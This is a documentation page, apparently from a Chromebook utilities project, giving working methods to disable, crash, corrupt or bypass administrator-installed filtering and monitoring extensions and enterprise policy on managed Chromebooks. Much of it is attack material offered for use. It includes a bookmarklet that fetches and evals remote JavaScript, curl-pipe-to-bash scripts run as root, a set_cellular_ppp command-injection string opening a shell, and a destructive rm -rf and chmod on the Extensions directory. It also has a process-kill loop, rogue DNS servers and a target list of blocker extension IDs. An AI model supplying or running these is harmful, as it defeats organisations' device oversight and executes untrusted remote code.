Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/S-PScripts/chromebook-utilities/llms.txt

Use this file to discover all available pages before exploring further.

Administrators on managed Chromebooks use policies to force-install extensions that cannot be removed through the normal Chrome Extensions UI. These extensions commonly handle web filtering, screen monitoring, or activity logging. By exploiting browser APIs and ChromeOS internals, users can disable, freeze, crash, or corrupt these extensions, restoring control over their browsing environment. The techniques below range from simple bookmarklets to shell-level commands and cover a wide spectrum of patched and unpatched methods.
Some of these methods — particularly flood, VMC, and corruption-based approaches — may cause device instability, unresponsive tabs, or require a restart to recover from. Back up any important data before attempting exploits that involve powerwashing.

LTBEEF Family

The LTBEEF (Literally The Best Exploit Ever Found) family leverages the chrome.management API, which is accessible from the Chrome Web Store origin. By visiting chrome.google.com/webstorex, the page inherits the Web Store’s elevated privileges, allowing JavaScript bookmarklets to call chrome.management.setEnabled() on any installed extension.
LTBEEF requires that bookmarklets are not blocked by policy. It has been patched in newer versions of ChromeOS.
Uses the chrome.management API from the Chrome Web Store context to present a GUI for disabling force-installed extensions.
1

Copy a bookmarklet

Copy one of the following bookmarklet URLs:CompactCow GUI:
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
Ingot GUI:
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
Basic (no GUI):
javascript: prompt("Extension IDs here: (seperated by commas)")
  .split(",")
  .forEach((i) => {
    chrome.management.setEnabled(i.trim(), !1);
  });
2

Create a bookmark

Create a new bookmark on your Chromebook and paste the JavaScript code into the URL field.
3

Visit the Web Store

Navigate to https://chrome.google.com/webstorex. If that doesn’t work, replace the x with any other character.
4

Run the bookmarklet

Click the bookmark you created. The GUI will appear.
5

Disable extensions

Use the GUI to toggle off any extensions you want to disable.
Credits: Bypassi#7037 (exploit), CompactCow#4717 (UI), Nebelung#1335 (Ingot)
Runs the same chrome.management.setEnabled call directly from the DevTools console on a privileged extension page.
1

Navigate to a privileged extension page

Go to chrome-extension://gndmhdcefbhlchkhipcnnbkcmicncehk/manifest.json.
2

Open DevTools

Open Inspect Element and go to the Console tab.
3

Disable the target extension

Run the following, substituting the target’s extension ID:
chrome.management.setEnabled('<extension id here>', false)
To re-enable an extension, run the same command with true instead of false.Credits: Bypassi (SprinkzMC#8421)
Uses the service worker debugger to gain access to the chrome.management API when the target extension uses a service worker. Requires Inspect Element to be enabled. If inspect element is disabled, use DPS instead.
1

Open Service Worker Internals

Navigate to chrome://serviceworker-internals.
2

Find the target extension

Locate your blocking extension in the list. Note that some extensions will not appear here.
3

Start and inspect

Click Start, then click Inspect.
4

Execute the disable command

In the console that opens, run:
chrome.management.setEnabled('<extension id here>', false)
To re-enable, run the same command with true.Credits: Nyaann#3881, 3kh0/ext-remover, SlitheringLizard1, KWI
Uses a Chrome flag to expose a Site Permissions menu in the extensions settings, allowing per-site permission control over admin-installed extensions. This is not a true exploit and cannot be patched, but it is highly policy-dependent and was patched as of ChromeOS version 142 for admin extensions.
  • The flag was introduced in Chrome 125.0.6398.0.
  • As of Chrome 133.0.6860.0 the new extensions menu is enabled by default in Chrome Canary builds.
  • Patched as of ChromeOS version 142 where it no longer works on admin extensions.
1

Enable the flag

Follow the instructions at https://html.cafe/xf2add817 to enable the relevant flag.
2

Open Site Permissions

Go to chrome://extensions and press Site Permissions.
Credits: secrethackerman99
An LTMEAT variant that uses a drag operation on copied extension page text to trigger a freeze, then flips the file URL access switch to disable the extension.
1

Find the extension page

Identify the largest file for your blocker extension, for example: chrome-extension://YourBlockerExtensionID/manifest.json
2

Open the extension settings tab

In a new tab, open chrome://extensions/?id=YourBlockerExtensionID.
3

Copy all content

On the blocker extension page, press Ctrl+A to select all the code, then copy it.
4

Drag to the tabs bar

Drag the copied text to the tabs bar. This may freeze your Chromebook a few times.
5

Click the extension tab

Click the Chrome extensions tab a few times, then wait while the Chromebook is frozen.
6

Duplicate the tab

Once less frozen, right-click the blocker extension page tab and duplicate it.
7

Flip the switch

Click Allow access to file URLs in the extensions tab (multiple times for good measure). The first tab should close itself.
Credits: Brandon421-ops, Titanium Network, writabl

LTMEAT Family

LTMEAT exploits the fact that ChromeOS pauses extensions on pages that are resource-constrained or hanging. By hanging an extension’s own page, you can momentarily disable its enforcement. These methods were patched in ChromeOS v115 but several workarounds (Flood, Print, Temp) extended their lifespan.
Core LTMEAT methods are patched since ChromeOS v115. Flood and Print variants work around the patch by overwhelming the browser process.
The original LTMEAT method. Kills an extension page and immediately hangs it to prevent it from reloading.Patched since ChromeOS v115.Before starting, get the extension ID by going to chrome://extensions/, finding the blocking extension, clicking Details, and copying the ID from the URL after ?id=.
1

Bookmark the extension page

Bookmark chrome-extension://<extensionidhere>/manifest.json.
2

Bookmark kill and hang pages

Also bookmark chrome://kill and chrome://hang.
3

Open the extension page

Click the extension page bookmark.
4

Kill then hang

Click the chrome://kill bookmark to kill the page, then immediately spam-click the chrome://hang bookmark.
5

Reload

Reload the tab within one to two seconds while still spamming the hang bookmark.
If you cannot visit the extension page afterwards, you have done it correctly.Credits: Bypassi — https://ltmeat.bypassi.com/
A simpler LTMEAT variant using the hang page and the Allow access to file URLs switch.Patched since ChromeOS v115.
1

Open the extension page

Bookmark and click chrome-extension://<extensionidhere>/manifest.json.
2

Hang the page

Click a bookmark set to chrome://hang to hang that tab.
3

Duplicate the hung tab

Duplicate the hanging tab.
4

Open Extensions settings

Navigate to chrome://extensions.
5

Toggle the switch

Find the extension you want to stop and click the Allow access to file URLs switch.
6

Close the extension tabs

One of the extension page tabs will close automatically. Close the other one. All pages should now be unblocked.
Credits: Bypassi — https://ltmeat.bypassi.com/
Overwhelms ChromeOS by opening ~800 extension page tabs simultaneously, which forces the hang state required for LTMEAT even after the v115 patch.
1

Create a large bookmark folder

Create a bookmark folder. Paste the extension page URL (chrome-extension://<extensionidhere>/manifest.json) into the folder approximately 800 times. Place it at the beginning of the folder. Use https://chrose.netlify.app/detail/ltmeat%20flood/ to help generate the folder.
2

Open all in a new window

Right-click the folder and select Open all in a new window.
3

Close the window

Close that window (without closing the individual tabs).
4

Open the folder again

Open the folder in a new window again — Chrome will hang the new tabs to manage the background ones.
5

Flip the switch

Go to chrome://extensions/?id=<extensionidhere> and flip the Allow access to file URLs switch.
Credits: 3kh0/ext-remover
A simplified Flood method that waits for the “page unresponsive” warning rather than reopening the folder.
1

Create a large bookmark folder

Follow the same folder creation step as LTMEAT Flood (~800 extension page URLs).
2

Open all in a new window

Right-click the folder and open all tabs.
3

Close the window

Close the entire window.
4

Open one extension page

Click the folder and open a single extension page. If you see a page unresponsive warning (do not click either button), proceed.
5

Flip the switch

Flip Allow access to file URLs in the extension settings. Close everything when done.
Credits: 3kh0/ext-remover
Uses the browser’s print dialog to force the extension page into a hung state.
1

Open the extension page and print

Navigate to chrome-extension://<extensionidhere>/manifest.json and press Ctrl+P. A print window will open showing a page count in the top right.
2

Maximize page count

Shrink margins, switch to landscape layout, and increase font size to maximize the page count. The higher the number, the longer the effect lasts.
3

Reload

Hit reload. The page should begin hanging.
4

Open extension settings

Go to chrome://extensions/?id=<extensionidhere>.
5

Duplicate and flip

Duplicate your print tab, return to extension settings, and flip the Allow Access to file URLS switch.
Credits: 3kh0/ext-remover, TeaEyeEighty4
Uses the extension’s background.js page instead of manifest.json to trigger the hang. Requires more careful timing using a “Kill switch” bookmark.
1

Set up bookmarks

  • Create a bookmark to chrome://extensions/?id=<extensionidhere> named Kill switch.
  • Create a bookmark folder named spam.js.
  • Add chrome-extension://<extensionidhere>/background.js to the folder 38 times using Ctrl+C / Ctrl+V in the Bookmark Manager.
2

Open all 38 tabs

Right-click the folder and click Open All (38). Repeat this step once more.
3

Wait for the popup

Click one of the tabs from the second batch and wait 30–60 seconds for a “This page is taking too long” popup. If it doesn’t appear, go to chrome://restart and add 3–4 more pages to the folder.
4

Duplicate and flip

Right-click a tab near the far right and hit Duplicate. Go to your Kill switch bookmark and flip the Allow Access to File:// urls switch.
5

Close right-side tabs

Click the leftmost extension tab (from the spam.js folder) and select Close all tabs to the right. Keep this tab open.
Go to chrome://settings/performance and turn Memory Saver off before attempting this. In the Memory Saver settings, also add the extension URL under “Keep these sites always active”.
Credits: 3kh0/ext-remover

Freeze Exploits

These exploits temporarily freeze an extension by overwhelming its rendering context with iframes or print operations, then use the “Allow access to file URLs” toggle to disable it.
Dextensify auto-detects supported extensions and floods them with nested iframes to freeze them. Supports GoGuardian, Securly, LANSchool, Blocksi, iBoss, Lightspeed, Hapara, and more.Open Dextensify at one of these URLs:
1

Open extension settings

Open chrome://extensions in a new tab and navigate to the settings page for the extension you want to disable.
2

Open Dextensify

Open Dextensify in another tab. It will auto-detect supported extensions.
3

Click Freeze

Click the Freeze [Extension Name] button. Immediately switch back to the chrome://extensions tab.
4

Spam the switch

On the chrome://extensions page, spam the Allow access to file URLs switch for a few seconds.
5

Maintain the effect

The extension is now temporarily disabled. Flip the switch again every few minutes if pages start getting blocked again. Reopen Dextensify periodically to prevent memory leaks.
Your Chromebook may hang momentarily during this process — this is normal.Credits: ading2210 — https://github.com/ading2210/dextensify
Creates a separate popup window that spams iframes and refreshes them to achieve a hang similar to LTMEAT Flood. After the popup closes, load any extension page before flipping the file URLs switch.Patched from ChromeOS v135+.Paste the Blobby-Boi data URL from https://github.com/Blobby-Boi/ExtHang3r into the URL bar. If the tab closes immediately, change data: to data:// at the start of the URL.Detailed instructions are provided on the exploit’s page.A macOS version is also available: https://hehehehaha.s3.us-east-2.amazonaws.com/unblocker2.0.htmlCredits: Blobby-Boi, Garrett2109
Successor to ExtHang3r. Floods iframes and prints the page, which hangs the embedded extension page rather than the embedder. More consistent and longer-lasting than other freeze methods.Patched in ChromeOS versions above 134.Paste the Blobby-Boi data URL from https://github.com/Blobby-Boi/ExtPrint3r into the URL bar. If the tab closes immediately, change data: to data://. Click the Disable button next to the target extension and follow the on-screen instructions.Credits: Blobby-Boi
Works on extensions that have a clickable popup and an input field. Hangs the extension by pasting a large emoji blob into an input field on the extension’s popup page.Works on v129.
1

Download the files

Download index.html and the emoji file from the Sigill Mediafire links, then insert the emoji file into the HTML file.
2

Copy to clipboard

Click Copy to clipboard on the Sigill page.
3

Open the extension popup

Click on the extension you want to disable to open its popup.
4

Paste in an input field

In a text input field within the popup, press Ctrl+V and after a second, press Ctrl+V again.
5

Open an extension page

Immediately open a related extension page (e.g., the manifest.json) and keep it open. Every page related to the extension should now hang indefinitely.
To undo: remove the hanging tab, or go to the extension page, scroll down, and toggle Allow access to file URLs on and off.Credits: Ashtino (AshtonDavies), Hack Hive

Crash Exploits

Continuously reloads extensions by flipping the fileAccess flag, causing them to crash. Requires an extension that was installed from the Chrome Web Store.
javascript:let shim = false;var ids = prompt("Extension ids (comma separated)").split(",");setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 145);
1

Bookmark the code

Create a bookmark using the JavaScript code above.
2

Find the extension ID

Go to chrome://extensions, click on the Web Store extension you want to crash, then click Details. Copy the ID from the URL after /?id=.
3

Open the Web Store page

Click View in Chrome Web Store and spam the Escape key. If you see a blank screen (not the Web Store), click the bookmarklet.
4

Enter extension IDs

Paste the extension ID(s) into the prompt, separated by commas.
This exploit stops working when you close the tab. It also requires that you have at least one extension installed from the Web Store.
Credits: CoolElectronics/velzie, Titanium Network
Crashes extensions that use browser action popups by spamming the extension icon during a specific network-off window at startup.Patched on ChromeOS v123.
1

Pin the extension icon

Click the jigsaw puzzle extension icon and pin the extension you want to crash.
2

Log out and disable Wi-Fi

Turn off Wi-Fi, sign out, and power off your Chromebook.
3

Boot and spam the icon

Turn the Chromebook back on. After logging in, turn Wi-Fi back on and open Chrome, then spam the pinned extension icon for about 30 seconds.
This effect lasts until reboot and may require a couple of attempts.Credits: Titanium Network

Corrupt Exploits

Corrupts an extension by disconnecting from the network mid-install, preventing it from completing its sync.
This exploit requires a powerwash, which wipes all local data including files under “My files”. Back up your data to Google Drive first.
1

Powerwash

Press Ctrl+Alt+Shift+R on the sign-in screen to powerwash, or enter recovery mode with Esc+Refresh+Power, then press Ctrl+D and Enter.
2

Sign in and immediately disconnect

Sign in to your account and immediately disconnect from your network.
3

Instant restart

Press Refresh+Power to restart instantly.
4

Sign in as existing user and wait

Sign in as an existing user. Navigate to chrome://extensions. Connect to your network and wait for the target extension to install automatically.
5

Disconnect and sign out

Immediately disconnect from your network and sign out. Sign back in.
The extension should now be corrupted. Check at chrome://extensions.Credits: AkaButNice, Bypassi#7037
Corrupts extensions by disabling extension sync before they can download from the admin policy. Requires that no ExtensionInstallForcelist policy is set.
1

Enter recovery or powerwash

Use Esc+Refresh+Power to enter recovery, or powerwash.
2

Log in and immediately turn off Wi-Fi

Sign in and immediately disable Wi-Fi.
3

Disable extension sync

Go to chrome://settings/syncSetup/advanced, click Customize sync, and turn off sync for Extensions and everything else. Save changes.
4

Turn on Wi-Fi

Re-enable Wi-Fi. Extensions should no longer install.
Credits: Minystreem56, Titanium Network
Continuously kills all extension processes via a shell loop. Requires shell (chronos) access; use the set_cellular_ppp method if on ChromeOS below v102.
while true; do kill -9 $(pgrep -f "\-\-extension\-process"); done
Run this command in the chronos shell. It prevents any extension from running in the background. Note that this also kills extensions you may want to keep.Credits: Rafflesia, Titanium Network
Uses OmadaDNS custom nameservers to prevent your Chromebook from downloading the enterprise policy that installs blocking extensions. Requires an unmanaged network where you can change nameservers (home or school guest network).
1

Powerwash or remove account

Either powerwash (Ctrl+Alt+Shift+R) or sign out, click the down arrow next to your name, press Remove account, and confirm.
2

Set custom nameservers

Find Quick Settings, go to your Wi-Fi network, click Network, scroll to Name Servers, and enter:
  • 1st: 66.94.105.229
  • 2nd: 66.23.198.252
  • 3rd: 0.0.0.0
  • 4th: 0.0.0.0
3

Reconnect and sign in

Disconnect and reconnect to the network, then sign in to your account.
If you connect to a Wi-Fi network without custom nameservers, your organisation’s policies and blocking extensions will be re-applied automatically.
Credits: Cuhassle, thefakesydney — https://github.com/cuhassle/CORMADA

Specific Disable Methods

Uses the remote debugging page to close the extension’s background process directly.Requirements: Access to chrome://inspect#devices and the target extension must have Remote Debugging enabled.
1

Open the inspect page

Go to chrome://inspect#devices.
2

Enable device discovery

Check the boxes for Discover USB Devices and Discover Network Targets if not already checked.
3

Close the extension

Find your blocker extension in the list and click Close.
Credits: Brandon421-ops
Disables extensions using service workers via chrome://serviceworker-internals when Inspect Element is disabled. Works on Blockfiletypes, LanSchool, and possibly others.
If Inspect Element is enabled, use JPCMG instead. This method will cause some websites (including UV proxies) to not function until the extension is re-enabled.
1

Open Service Worker Internals

Go to chrome://serviceworker-internals.
2

Enable the debug checkbox

Check the box labelled Open DevTools and pause JavaScript execution on Service Worker startup for debugging.
3

Stop and unregister

Find the target extension. Click Stop (skip if not available), then click Unregister.
To re-enable, uncheck the checkbox mentioned in step 2.Credits: theskid22, Titanium Network
If a blocking extension communicates with a companion Chrome App over HTTP on localhost, adding HSTS for 127.0.0.1 and localhost forces HTTPS — which the local server cannot handle — effectively cutting off their communication.Known working extensions: Cisco Umbrella, iBossKnown not working: Securly, GoGuardian, any extension without a companion Chrome App
1

Open Net Internals

Go to chrome://net-internals and open the Domain Security Policy tab.
2

Add HSTS for 127.0.0.1

Enter 127.0.0.1 in the Add HSTS domain text box and click Add.
3

Add HSTS for localhost

Repeat with localhost.
4

Restart Chrome

Open chrome://restart.
You may need to log out and back in for some extensions (e.g., iBoss).Credits: 9pfs, Titanium Network
Uses the vmc create-extra-disk command in Crosh to place a file at the extension’s installation path, preventing it from ever installing.Patched from ChromeOS v123.
1

Powerwash and log in offline

Powerwash, then log in to your Google account and immediately disable internet.
2

Open Crosh

Press Ctrl+Alt+T or go to chrome-untrusted://crosh/.
3

Disable all extensions (or specific ones)

To disable all extensions:
vmc create-extra-disk --size 1 /home/chronos/user/Extensions
To disable a specific extension by ID:
vmc create-extra-disk --size 1 /home/chronos/user/Extensions/{extension_id}
Example: vmc create-extra-disk --size 1 /home/chronos/user/Extensions/cjpalhdlnbpafiamejdnhcphjbkeiagm
4

Re-enable internet

Turn internet back on — the blocked extensions should no longer install.
Credits: vk6 — https://local.ading.dev/vmc.html
An LTMEAT Print variant designed for devices where chrome://extensions is disabled. Works by signing in offline and using the print dialog hang.Works on recent versions including v124 and v125.For users who can toggle internet on the sign-in screen:
1

Set up beforehand

Bookmark the largest file of the extension you want to hang. Adjust print settings for maximum page count (increased margins, font size). Sign out.
2

Sign in offline

Sign in without internet. Open a new tab.
3

Open two extension page tabs

Click the bookmark, then open a new tab, Ctrl+click the bookmark, then click the bookmark again. You should now have two extension page tabs.
4

Print and reload

Press Ctrl+P on one of them, then reload that tab. Duplicate it.
5

Wait for popup

Wait for the “tab is not loading” popup. Press Ctrl+Shift+W.
6

Turn on internet

Turn internet back on.
Credits: Segfault (exploit), BreakingTech.Ink (post), Bypassi (LTMEAT framework), TeaEyeEighty4 (Anesthesia/LTMEAT Print)
Uses the Chrome Task Manager to kill an extension’s background process. A bookmarklet is needed to prevent the tab from being closed again.
1

Open Task Manager

Press Search+Esc to open Task Manager.
2

Find and kill the extension

Scroll to the bottom, find your blocking extension, highlight it, and click End Process (or press Enter).
3

Keep the tab open

Immediately navigate to the page you want to access. To prevent GoGuardian or similar from re-closing it, use one of these bookmarklets:
javascript:onbeforeunload=i=>1
Method 2 (Task Manager blocked): Navigate to chrome-extension://<extensionid>/_generated_background_page.html, then change the URL to chrome://kill.
chrome://kill does not work on newer versions of ChromeOS due to its use in LTMEAT. Method 2 is therefore also blocked on these versions.
Credits: TheGreatestGiant, Titanium Network
Sets custom DNS servers (OmadaDNS) that block the domains extensions rely on for their blocking and sync infrastructure. Breaks GoGuardian, Securly, Lightspeed, and more.
1

Open Wi-Fi network settings

Go to Settings → click your Wi-Fi name → click it again → go to the Network section.
2

Set custom nameservers

Scroll to Name servers and change to Custom Name Servers:
  • 1st: 66.23.198.252
  • 2nd: 66.94.105.229
  • 3rd: 167.86.91.171
  • 4th: 0.0.0.0
3

Reconnect

Toggle Wi-Fi off and back on to refresh the connection.
This breaks ChromeOS updates. Do not connect to a Wi-Fi network without OmadaDNS active after using this method, or extensions may update and re-enable their blocking. Also commonly breaks locked-mode quizzes.
If your school has Managed Networks enabled, use cauDNS instead. This DNS is blocked by Securly.Credits: Omada — https://omada.cafe/

Extension Tools

A reference list of common blocker extension IDs for use in exploits.
Extension NameExtension ID
GoGuardianhaldlgldplgnggkjaafhelgiaglafanh
Securly (new)ckecmkbnoanpgplccmnoikfmpcdladkc
Securly (old)joflmkccibkooplaeoinecjbmdebglab
Securly (old 2)iheobagjkfklnlikgihanlhcddjoihkg
Securly Classroomjfbecfmiegcjddenjhlbhlikcbfmnafd
Blocksipgmjaihnmedpcdkjcgigocogcbffgkbn
iBosskmffehbidlalibfeklaefnckpidbodff
Fortiguardigbgpehnbmhgdgjbhkkpedommgmfbeao
Cisco Umbrellajcdhmojfecjfmbdpchihbeilohgnbdci
Haparakbohafcopfpigkjdimdcdgenlhkmhbnc
Hapara (new)aceopacgaepdcelohobicpffbbejnfac
LANSchoolbaleiojnjpgeojohhhfbichcodgljmnj
LanSchool Web Helperhonjcnefekfnompampcpmcdadibmjhlk
Lightspeed Filter Agentadkcpkpghahmbopkjchobieckeoaoeem
Lightspeed Classroomkkbmdgjggcdajckdlbngdjonpchpaiea
ContentKeeperjdogphakondfdmcanpapfahkdomaicfa
CK-Authenticator G3odoanpnonilogofggaohhkdkdgbhdljp
Linewizeddfbkhpmcdbciejenfcolaaiebnjcbfc
Smoothwalljbldkhfglmgeihlcaeliadhipokhocnm
Impero Backdropjjpmjccpemllnmgiaojaocgnakpmfgjg
Mobile Guardian (installed)fgmafhdohjkdhfaacgbgclmfgkgokgmb
IMTLazaruscgigopjakkeclhggchgnhmpmhghcbnaf
NetRefkhfdeghnhlpdfeenmdofgcbilkngngcp
InterCLASS Filteringjbddgjglgkkneonnineaohdhabjbgopi
InterSafe Gatewayecjoghccnjlodjlmkgmnbnkdcbnjgden
Gopher Buddycgbbbjmgdpnifijconhamggjehlamcif
RM SafetyNet Gokmhjojemanablihnkjnnikokobgahlea
To find any extension ID: go to chrome://extensions/, find the extension, click Details, and copy the string after ?id= in the URL.
Makes extensions inactive by enabling Developer Mode, signing in, then signing out and disabling sync for extensions.
1

Enable Developer Mode at home

Turn on Developer Mode (see the Developer Mode guide). Do this at home to avoid complications with school Wi-Fi.
2

Add Wi-Fi and sign in

Add your Wi-Fi, sign in to your account.
3

Quickly turn off Wi-Fi

Before extensions finish loading, turn off Wi-Fi.
4

Sign out of sync

Go to chrome://settings/signOut and click the blue button.
5

Turn Wi-Fi back on and disable sync

Turn Wi-Fi back on and turn off both sync and personalisation.
Workaround A: Go to chrome://settings/resetProfileSettings → click Current Settings → on the blank page run:
javascript:opener.chrome.send("TurnOffSync");
Workaround B: Go to chrome://settings/syncSetup/advanced → set mode to Customize Sync → turn sync off for Extensions and Apps.Credits: Brandon421-ops
A bookmarklet that provides a GUI to install extensions by ID when the Chrome Web Store is blocked.
1

Navigate to the Web Store context

Go to https://chrome.google.com/webstorex.
2

Run the bookmarklet

Create and run the Extension Installer bookmarklet (see source file for the full JavaScript URL).
3

Enter extension details

Enter your preferred icon URL, extension name, and extension ID.
4

Install

Click the Add to Chrome button.
This exploit does not work if an extension blocklist policy is set.
Credits: AkaButNice
Downloads a CWS extension as a ZIP and loads it as an unpacked extension. Requires Developer Mode to be enabled.
1

Get the extension URL

Obtain the Chrome Web Store URL for the extension, or use the clients2.google.com redirect URL format.
2

View in CRX Viewer

Go to https://robwu.nl/crxviewer/ and paste the URL. Click Open in this viewer.
3

Download the ZIP

Click Download to save the extension as a ZIP file.
4

Create a folder and unzip

Create a new folder and extract all ZIP contents into it.
5

Load unpacked

Go to chrome://extensions, enable Developer Mode, click Load unpacked, select the folder, and click Open.
Credits: S-PScripts
Uses Chrome’s Manifest V2 deprecation flags to disable any extension that still uses Manifest V2. Requires the ExtensionManifestV2Availability policy to be unset or set to 0.Note: As of ChromeOS v139, MV2 extensions no longer work regardless of flags.
1

Check policy

Go to chrome://policy, search for ExtensionManifestV2Availability, and check Show policies with no value set. Proceed only if the value is unset or 0.
2

Check the extension's manifest version

Visit chrome-extension://<extension-id>/manifest.json and look for "manifest_version": 2.
3

Enable the deprecation flags

Go to chrome://flags and enable:
  • #extension-manifest-v2-deprecation-warning
  • #extension-manifest-v2-deprecation-disabled
  • #extension-manifest-v2-deprecation-unsupported (ChromeOS v131)
4

Restart

Restart Chrome. MV2 extensions should now be disabled.

Policy Bypass

Pollen loads a custom user policy into ChromeOS, overriding the admin-set policy. Requires Developer Mode.Normal Method:
1

Open Crosh shell

Navigate to chrome-untrusted://crosh, run shell, then run sudo su.
2

Run the Pollen script

curl -Ls https://mercuryworkshop.github.io/Pollen/Pollen.sh | bash
3

Apply policies

If policies don’t apply after a few seconds, press Alt+VolumeUp+X.
RootFS Method (permanent, but disabling RootFS soft-bricks normal mode):
1

Run the RootFS script

curl -Ls https://mercuryworkshop.github.io/Pollen/RootFS.sh | bash
2

Reboot and run PollenFS

After rebooting, repeat the shell elevation steps, then run:
curl -Ls https://mercuryworkshop.github.io/Pollen/PollenFS.sh | bash
Credits: Scaratek (developer), Rafflesia (discovery), OlyB (original script)
Replaces the user policy with a custom one that enables ARC (Play Store) and unblocks all policy-blocked URLs. Requires downgrading to below v102.
1

Downgrade ChromeOS

Downgrade to a version below 102.
2

Open Crosh and elevate

Open Crosh (Ctrl+Alt+T) and type:
set_cellular_ppp ';bash;exit'
3

Run the bypass script

sh <(curl -k https://schoolexploitkid.github.io/user-policy-bypass/bypass.sh) & disown
4

Remove the school account

Remove your school account, log out, or clear it as appropriate for your device.
5

Set custom DNS

In your router settings, set the DNS to 129.213.58.41 or block m.google.com. Then log back in to your school account.
Credits: velzie/CoolElectronics, Titanium Network
Chrose (also known as Ext-Remover) is an exploit hub by AshtonDavies that hosts many of these exploits as a web interface.
Permanently removes extensions via the chronos shell by deleting the Extensions directory and marking it read-only. Requires downgrading to below v103.
1

Downgrade ChromeOS

Downgrade to any version below 103.
2

Open Crosh and elevate

Press Ctrl+Alt+T to open Crosh, then run:
set_cellular_ppp \';bash;exit;\'
3

Remove extensions

rm -rf ~/Extensions/*
This will break every extension. To selectively remove by ID, target specific subdirectories.
4

Lock the folder

chmod 000 ~/Extensions
This marks the directory read-only, preventing future installs or updates.
5

All-in-one command

Or run everything at once:
set_cellular_ppp 'chmod 777 ~/Extensions;rm -rf ~/Extensions;mkdir ~/Extensions;chmod 000 ~/Extensions;echo done;exit'
After this, you can update to the latest ChromeOS version. All removed extensions will have default icons and will not function.Credits: CoolElectronics/velzie, Titanium Network

Build docs developers (and LLMs) love

Get started for freeTalk to us